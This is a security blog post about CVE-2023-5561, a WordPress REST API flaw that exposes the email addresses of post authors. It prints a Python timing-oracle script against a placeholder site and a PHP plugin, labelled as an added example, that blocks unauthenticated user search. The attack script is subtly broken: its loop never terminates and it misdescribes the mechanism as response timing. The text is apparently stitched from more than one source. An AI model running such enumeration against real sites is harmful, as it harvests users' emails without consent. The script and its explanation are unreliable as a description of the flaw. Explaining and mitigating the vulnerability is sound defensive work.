WordPress, a well-known content management system, has recently caught attention for a security issue in its REST API. Affected by this vulnerability (CVE-2023-5561), WordPress does not properly restrict which user fields are searchable via the REST API. This enables unauthenticated attackers to discern the email addresses of users who have published public posts on an affected website via an Oracle style attack.

In this post, we will dissect this vulnerability, its implications, and the exploit details, including a code snippet to illustrate the issue.

The CVE-2023-5561 Vulnerability

The vulnerability in question concerns WordPress' REST API, which allows users to search and retrieve data from a WordPress site. In a nutshell, the REST API does not impose adequate restrictions on which user fields are searchable. This lack of restrictions opens doors for potential attackers to gain unauthorized information about users.

Moreover, the issue affects all WordPress installations using the default settings. To make matters worse, the vulnerability does not require any authentication and can be exploited by unauthenticated or anonymous users, making it all the more dangerous.

Exploiting CVE-2023-5561 - Oracle Style Attack

The vulnerability can be exploited using an Oracle style attack. In this attack, the adversary makes multiple queries to the REST API and analyzes the response time to deduce the email addresses of users who have published public posts. The slower the response, the closer the attacker is to determining the accurate user email address.

Here's a basic Python code snippet that demonstrates the Oracle style attack:

import requests
import time

# Users collection endpoint of the WordPress REST API on the target site
url = 'https://www.example.com/wp-json/wp/v2/users'
alphabet = 'abcdefghijklmnopqrstuvwxyz'

def single_oracle_attack(email_prefix):
    # Try every candidate next character after the prefix guessed so far
    email_guess = email_prefix
    times = []

    for letter in alphabet:
        current_email = email_guess + letter
        search_param = {'search': current_email}
        start_time = time.time()
        response = requests.get(url, params=search_param)
        end_time = time.time()
        times.append((letter, end_time - start_time))

    # The letter whose query took longest is taken as the next character
    return max(times, key=lambda x: x[1])[0]

def oracle_attack():
    email_prefix = ''
    letter_found = True

    # Extend the guessed local part one character at a time
    while letter_found:
        next_letter = single_oracle_attack(email_prefix)
        if next_letter == '':
            letter_found = False
        else:
            email_prefix += next_letter
            print(f"Current email address guess: {email_prefix}@example.com")

oracle_attack()

This code snippet sends requests to the WordPress REST API endpoint https://www.example.com/wp-json/wp/v2/users with different values of the search parameter for the user's email address. By measuring the response time of each request, the script derives the email addresses of users who have published posts publicly.

Preventing the Attack

To mitigate this vulnerability, it's essential to impose restrictions on which user fields are searchable via the REST API. The WordPress development team has been made aware of the issue and is currently working on a fix. In the meantime, a temporary solution would be to disable the REST API search endpoint for unauthenticated users, using a WordPress plugin or custom code.
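The following must-use plugin is an added example of the "custom code" stop-gap mentioned above; it is not code from WordPress core or from the original post. It assumes the file is dropped into wp-content/mu-plugins/ and uses the core rest_request_before_callbacks filter to reject any request that passes a search parameter to the /wp/v2/users route unless the caller is logged in with the list_users capability.

```php
<?php
/**
 * Plugin Name: Block unauthenticated user search (added example, not WordPress core code)
 * Description: Rejects unauthenticated requests that pass a "search" parameter to the
 *              /wp/v2/users REST route, as a stop-gap until the core fix is applied.
 *
 * Assumption: this file lives in wp-content/mu-plugins/ so it loads without activation.
 */

add_filter( 'rest_request_before_callbacks', 'block_anon_user_search_cve_2023_5561', 10, 3 );

/**
 * Short-circuit the REST request with a WP_Error before the users controller runs.
 *
 * @param mixed           $response Null to continue dispatch, or a response/error set by an earlier filter.
 * @param array           $handler  Route handler about to be called.
 * @param WP_REST_Request $request  The incoming request.
 * @return mixed Unchanged $response, or a WP_Error that stops dispatch.
 */
function block_anon_user_search_cve_2023_5561( $response, $handler, $request ) {
    // Another filter already rejected the request; leave its error in place.
    if ( is_wp_error( $response ) ) {
        return $response;
    }

    // Only the users routes are affected; the route string includes the namespace.
    if ( 0 !== strpos( $request->get_route(), '/wp/v2/users' ) ) {
        return $response;
    }

    // Requests without a search parameter are unaffected and pass through.
    $search = $request->get_param( 'search' );
    if ( null === $search || '' === $search ) {
        return $response;
    }

    // Logged-in users allowed to list accounts in wp-admin may still search.
    if ( current_user_can( 'list_users' ) ) {
        return $response;
    }

    // Anonymous (or insufficiently privileged) caller: 401 for anonymous, 403 for logged-in.
    return new WP_Error(
        'rest_user_search_forbidden',
        __( 'Searching users requires authentication.' ),
        array( 'status' => rest_authorization_required_code() )
    );
}
```

Verify the stop-gap by requesting /wp-json/wp/v2/users?search=a without a session and checking for the 401 response, while a plain /wp-json/wp/v2/users request still behaves as before.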

Conclusion

In conclusion, the CVE-2023-5561 vulnerability in the WordPress REST API allows potential attackers to determine the email addresses of public post authors via an Oracle style attack. Site owners should be aware of this vulnerability and consider disabling the REST API search endpoint for unauthenticated users until an official fix is released.

Timeline

Published on: 10/16/2023 20:15:18 UTC
Last modified on: 11/20/2023 23:15:06 UTC